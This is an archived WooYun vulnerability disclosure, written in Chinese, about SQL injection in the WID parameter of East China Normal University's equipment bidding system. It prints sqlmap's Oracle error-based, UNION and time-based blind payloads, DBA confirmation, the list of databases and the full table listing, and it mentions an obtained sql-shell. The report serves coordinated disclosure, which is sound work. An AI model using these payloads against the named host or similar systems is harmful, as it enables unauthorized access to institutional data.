乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
如题
看到漏洞有这个网站的、但搜了一下关键字、没搜到应该是没提交过的0x01 漏洞位置
华东师范大学设备竞价系统
0x02 漏洞具体
http://jingjia.ecnu.edu.cn/sggl/wsjj/ggztDetails.jsp?WID=1
0x03 漏洞利用方式
sqlmap
0x04 漏洞证明
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: WID Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) Payload: WID=1' AND 1357=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1357=1357) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113)) AND 'VMng'='VMng Type: UNION query Title: Generic UNION query (NULL) - 3 columns Payload: WID=1' UNION ALL SELECT NULL,CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||CHR(103)||CHR(68)||CHR(81)||CHR(71)||CHR(97)||CHR(73)||CHR(82)||CHR(106)||CHR(103)||CHR(81)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113),NULL FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: WID=1' AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(116)||CHR(114)||CHR(98),5) AND 'FeZB'='FeZB---[13:47:01] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle
发现是DBA权限
[13:44:57] [INFO] testing if current user is DBA[13:44:57] [WARNING] reflective value(s) found and filtering outcurrent user is DBA: True
数据库全部信息
available databases [24]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] HSD_ZJK[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB[*] ZC[*] ZC20110430[*] ZC20140731[*] ZC_TEST[*] ZCTEST
表信息
Database: ZC[320 tables]+--------------------+| AQCHEN_338 || AQCHEN_GXJJ_YQDC || AQCHEN_ORG01 || AQCHEN_T_SB || A_TMP_BH || E$_ZC_BM_TEMP || E$_ZC_JFB_TEMP || E$_ZC_JFKMYE_TEMP || E$_ZC_YH_TEMP || I$_ZC_BM_TEMP_LOG || I$_ZC_JFB_TEMP_LOG || I$_ZC_YH_TEMP_LOG || PLAN_TABLE || RY || RYLX || SNP_CHECK_TAB || SYS_KFRWGL || SYS_RYGL || T_JCSJ_DM || T_XTGL_SJB || T_XTGL_SJBZD || XLLX || ZCLX || ZC_AZDD || ZC_BDLX || ZC_BDSQBDYY || ZC_BDSQD || ZC_BDSQKP || ZC_BDSQLB || ZC_BDXZ || ZC_BFPC || ZC_BH2SYS_DW || ZC_BH2SYS_KCK || ZC_BH2SYS_RY || ZC_BH2SYS_SJ6 || ZC_BH2SYS_SJ7 || ZC_BH2SYS_SYMC || ZC_BH2SYS_SYXM || ZC_BHDZ_BDK || ZC_BHDZ_ZJK || ZC_BHJJ_BDK || ZC_BHJJ_ZJK || ZC_BHSB_BDK || ZC_BHSB_FJK || ZC_BHSB_ZJK || ZC_BLZT || ZC_BLZTPZ || ZC_BM || ZC_BMNDJC || ZC_BMNDJCCXTJ || ZC_BM_20151019 || ZC_BM_TEMP || ZC_BZD || ZC_BZDJFLY || ZC_BZDMS || ZC_BZDPTCX || ZC_BZDPZ || ZC_CWRECORD_TEMP || ZC_CWZJDJD || ZC_CZBMBPZ || ZC_CZBZCDL || ZC_CZBZCFL || ZC_DMZHB || ZC_DQKPXX || ZC_DQKPXXM200912 || ZC_DQKPXXM201012 || ZC_DQKPXXM201112 || ZC_DQKPXXM201208 || ZC_DQKPXXM201212 || ZC_DQKPXXM201308 || ZC_DQKPXXM201312 || ZC_DQKPXXM201408 || ZC_DQKPXXM201412 || ZC_DQKPXXM201508 || ZC_DXQY_GG || ZC_DXYQDWFW || ZC_DXYQJZRY || ZC_DXYQXX || ZC_DXYQ_CEJL || ZC_DXYQ_CEPJ || ZC_DXYQ_DJCSCSSJ || ZC_DXYQ_FL || ZC_DXYQ_FMZL || ZC_DXYQ_HJQK || ZC_DXYQ_KFSJD || ZC_DXYQ_KFSJDFA || ZC_DXYQ_KJCG || ZC_DXYQ_LWQK || ZC_DXYQ_NDKHB || ZC_DXYQ_PXQK || ZC_DXYQ_RJH || ZC_DXYQ_SC || ZC_DXYQ_YJH || ZC_DXYQ_YYD || ZC_DXYQ_YYDDCYP || ZC_DXYQ_YYDYYSJ || ZC_DXYQ_YYZTXGJL || ZC_DXYQ_ZJH || ZC_DXYQ_ZJHMX || ZC_EXPORTLIST || ZC_FCBZ || ZC_FCBZPZ || ZC_FCMJ || ZC_FCPZ || ZC_FCPZBZ || ZC_FCPZDL || ZC_FCPZXL || ZC_FIELDOFTABLE || ZC_FJ || ZC_FJJY || ZC_FJJYKP || ZC_FJJYSQ || ZC_FJJYSQKP || ZC_FJSY || ZC_GBZCDL || ZC_GBZCFL || ZC_GGDMCXTJ || ZC_GJDL || ZC_GJXL || ZC_GNCD || ZC_HMDYH || ZC_JFB || ZC_JFB_TEMP || ZC_JFFP || ZC_JFKMYE || ZC_JFKMYE_TEMP || ZC_JFLY || ZC_JFYS || ZC_JFYSLS || ZC_JFZD || ZC_JFZKK || ZC_JFZL || ZC_JGYQSYXY || ZC_JKDJB || ZC_JKDLGS || ZC_JKSBBLQK || ZC_JS || ZC_JSGNQX || ZC_JWZCFL || ZC_JYJL || ZC_JYSQD || ZC_KPBDXX || ZC_KPMS || ZC_KPPZ || ZC_KPTJBB || ZC_KPTJBBCX || ZC_KPXX || ZC_KPXX_QCPC || ZC_KPXX_SJTXJD || ZC_LC || ZC_LCJD || ZC_LSBZD || ZC_LSBZDJFLY || ZC_LSJFLY || ZC_LSKPXX || ZC_LSSGD || ZC_LSSGDJFLY || ZC_PDHZB || ZC_PDJL || ZC_PDSJLSB || ZC_PEDL || ZC_PEPZ || ZC_PETJ || ZC_PEXL || ZC_PJJB || ZC_QCPKB || ZC_QCPYB || ZC_QCSBPZB || ZC_QXCXTJ || ZC_RWCX || ZC_RWSJ || ZC_RWSJX || ZC_RWZX || ZC_RWZXBM || ZC_RWZXJD || ZC_RY || ZC_RYLX || ZC_SBBB || ZC_SBBBCXTJ || ZC_SBBBPZ || ZC_SBBBZT || ZC_SBBDXZ || ZC_SBBDYY || ZC_SBD || ZC_SBKP || ZC_SBQG || ZC_SBSJTXJD || ZC_SGCYWP || ZC_SGD || ZC_SGDCGY || ZC_SGDJFLY || ZC_SGDMS || ZC_SGDPZ || ZC_SGHT || ZC_SGHTFKQK || ZC_SGHTJFLY || ZC_SGHTPZ || ZC_SGHTXGSGD || ZC_SGSCDY || ZC_SGZB || ZC_SGZBFB || ZC_SGZBJJD || ZC_SGZBJJDMX || ZC_SGZBXGSGD || ZC_SGZBXGSGD_LSB || ZC_SGZBXGSGD_XG || ZC_SGZB_BLQK || ZC_SGZB_CGPS || ZC_SGZB_JDLB || ZC_SGZB_JG || ZC_SGZB_PBJDZ || ZC_SGZB_PBMXXX || ZC_SGZB_PBZJ || ZC_SGZB_PBZJZ || ZC_SGZB_PBZJ_CGXM || ZC_SGZB_PBZJ_ZZLW || ZC_SGZB_PFB || ZC_SGZB_PFBF || ZC_SGZB_PFFA || ZC_SGZB_PFFA_PFBF || ZC_SGZB_TBXX || ZC_SGZB_ZHDFB || ZC_SHZCFL || ZC_SJDX || ZC_SJSJRW || ZC_SJZD || ZC_SJZDBM || ZC_SYSGLCXTJ || ZC_SYSGLSJ || ZC_SYSGLSJMS || ZC_SYSKP || ZC_SYSKPMS || ZC_SYSKPZX || ZC_TJBBPZCS || ZC_TSHJY || ZC_TYBMS || ZC_WPCK || ZC_WPCKD || ZC_WPCKDMX || ZC_WPFKDJD || ZC_WPFKLYSQD || ZC_WPFL || ZC_WPFL_TEMP || ZC_WPGYDW || ZC_WPKC || ZC_WPLYSQD || ZC_WPLYSQDMX || ZC_WPRKD || ZC_WPRKDMX || ZC_WPRKSQD || ZC_WPRKSQDMX || ZC_WPSYDJD || ZC_WPXX || ZC_WPXX_IMP || ZC_WPYDJC || ZC_WPYDJCMX || ZC_WXJL || ZC_WXJLKP || ZC_WXJLMX || ZC_WXSQD || ZC_XLLX || ZC_XQ || ZC_XTCS || ZC_XTCS_CLOB || ZC_XTGG || ZC_XTGGCX || ZC_XTGGLM || ZC_XTRZ || ZC_XTRZ_HISTORY || ZC_XTRZ_OPERATE || ZC_XTRZ_PZXX || ZC_XX || ZC_XXBMBM || ZC_XXTZ || ZC_XXTZ_LS || ZC_YH || ZC_YHBBQX || ZC_YHBMQX || ZC_YHBMQXCX || ZC_YHXQQX || ZC_YHZ || ZC_YHZCLXQX || ZC_YHZSHJS || ZC_YH_TEMP || ZC_YQLJ || ZC_YSTZ || ZC_YSXX || ZC_YSXXZQTZ || ZC_YSZT || ZC_YW || ZC_YWBM_SPBEAN || ZC_YWDBR || ZC_YWDBRSZLOG || ZC_YWFJ || ZC_YWFJFL || ZC_YWFL_BLOB || ZC_YWLZ || ZC_YWLZGJDCLR || ZC_YWLZRZ || ZC_YWMXXMCLQK || ZC_YXBM || ZC_YXJFLY || ZC_ZC || ZC_ZCBZCXTJ || ZC_ZCDL || ZC_ZCDLJGXZ || ZC_ZCFL || ZC_ZCFL1 || ZC_ZCGYS || ZC_ZCGYSNS || ZC_ZCGYSPJ || ZC_ZCLX || ZC_ZCPTYH || ZC_ZCSX || ZC_ZDPZ || ZC_ZFBKD || ZC_ZFJFB || ZC_ZFPZ || ZWLX || ZWLX2 |+--------------------+
获取sql-shell
我觉得该换系统了
危害等级:高
漏洞Rank:10
确认时间:2015-12-07 14:07
通知二级单位处理。
暂无